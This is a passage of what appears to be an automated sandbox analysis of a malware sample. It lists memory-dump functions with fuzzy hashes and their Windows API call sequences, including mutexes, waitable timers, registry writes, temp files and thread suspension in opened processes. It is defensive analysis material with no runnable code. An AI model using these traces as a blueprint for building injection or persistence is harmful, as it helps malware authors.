    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastErrorGetVersion
  • String ID: GET$POST
  • API String ID: 2325875326-3192705859
  • Opcode ID: 26b0fd4c2e62fc57389cc46e4c3039c84c7b440f69484f47d42f00f4ba49821f
  • Instruction ID: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
  • Opcode Fuzzy Hash: BC014CB305DC52EBD17BB6950006FB39B84DF12AF6CDC611079816A3DCBE8072355B40
  • Instruction Fuzzy Hash: 2d848e266604d7f3202df0d77fbb157f043afe7d069b6b050c1dca03819d605d
APIs
    • Part of subcall function 001D9640: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001DE6F9,00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000), ref: 001D9649
    • Part of subcall function 001D9640: mbstowcs.NTDLL ref: 001D9670
    • Part of subcall function 001D9640: memset.NTDLL ref: 001D9682
  • GetVersion.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE705
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(00000008,00000000,00000000,?,?,001DE988,?,?,00000001,00000000,00000000,?,00000008,00000030), ref: 001DE834
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
